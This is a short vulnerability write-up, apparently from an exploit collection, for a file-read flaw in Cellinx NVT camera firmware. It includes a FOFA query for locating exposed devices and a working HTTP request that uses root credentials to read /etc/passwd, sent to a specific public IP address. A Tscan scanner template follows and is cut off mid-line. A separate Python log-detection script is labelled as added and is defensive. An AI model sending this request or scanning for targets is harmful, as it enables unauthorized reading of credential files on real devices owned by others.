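Vulnerability description
Cellinx NVT v1.0.6.002b contains a security vulnerability: a local file disclosure flaw that allows an attacker to read sensitive information such as system passwords.
Affected versions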
Cellinx NVT v1.0.6.002b
FOFA: body="local/NVT-string.js"
Vulnerability reproduction
Verification PoC
GET /cgi-bin/GetFileContent.cgi?USER=root&PWD=D1D1D1D1D1D1D1D1D1D1D1D1A2A2B0A1D1D1D1D1D1D1D1D1D1D1D1D1D1D1B8D1&PATH=/etc/passwd&_=1672577046605 HTTP/1.1
Host: 121.159.32.161
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Connection: close
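Detection example (added here, not part of the original write-up or of any vendor tooling): a log check that flags requests to GetFileContent.cgi whose PATH parameter, after undoing nested URL-encoding, points into system directories or contains traversal segments. It assumes a reverse proxy in front of the device writes Common/Combined Log Format; the prefix list and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

ENDPOINT = "/cgi-bin/getfilecontent.cgi"  # endpoint from the PoC request, lower-cased
# Assumption: directories the web UI has no reason to read; tune per deployment.
SENSITIVE_PREFIXES = ("/etc/", "/proc/", "/root/", "/var/", "/dev/")
# Assumption: Common/Combined Log Format; captures client, request target, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3})')

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (%252F -> %2F -> /) before matching."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_line(line):
    """Return a finding for a suspicious GetFileContent.cgi request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, target, status = m.groups()
    url = urlsplit(target)
    if fully_decode(url.path).lower() != ENDPOINT:
        return None
    params = {k.upper(): v[0] for k, v in parse_qs(url.query).items()}
    path = re.sub(r"/+", "/", fully_decode(params.get("PATH", "")))  # collapse "//"
    reasons = []
    if ".." in path.split("/"):
        reasons.append("traversal")
    if (path + "/").startswith(SENSITIVE_PREFIXES):
        reasons.append("system-path")
    finding = {"client": client, "path": path, "reasons": reasons, "served": status == "200"}
    return finding if reasons else None

def scan(lines):
    return [f for f in map(inspect_line, lines) if f]

# Constructed sample log lines (documentation IP ranges, password redacted).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /cgi-bin/GetFileContent.cgi?USER=root&PWD=REDACTED&PATH=/etc/passwd&_=1 HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /cgi-bin/GetFileContent.cgi?PATH=%252Fetc%252F%252Fshadow HTTP/1.1" 403 0',
    '192.0.2.10 - - [01/Jan/2024:10:00:09 +0000] "GET /local/NVT-string.js HTTP/1.1" 200 2048',
    '192.0.2.22 - - [01/Jan/2024:10:00:12 +0000] "GET /cgi-bin/GetFileContent.cgi?PATH=lang/en.txt HTTP/1.1" 200 90',
]

if __name__ == "__main__": print(*scan(SAMPLE_LOG), sep="\n")
```

A finding with "served": True means the request returned HTTP 200, so the file contents should be treated as disclosed and the device's credentials rotated.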
Tscan POC
poc:
  params: []
  name: poc-yaml-Cellinx NVT-fileread
  set: {}
  rules:
  - method: GET
    path: /cgi-bin/GetFileContent.cgi?USER=ro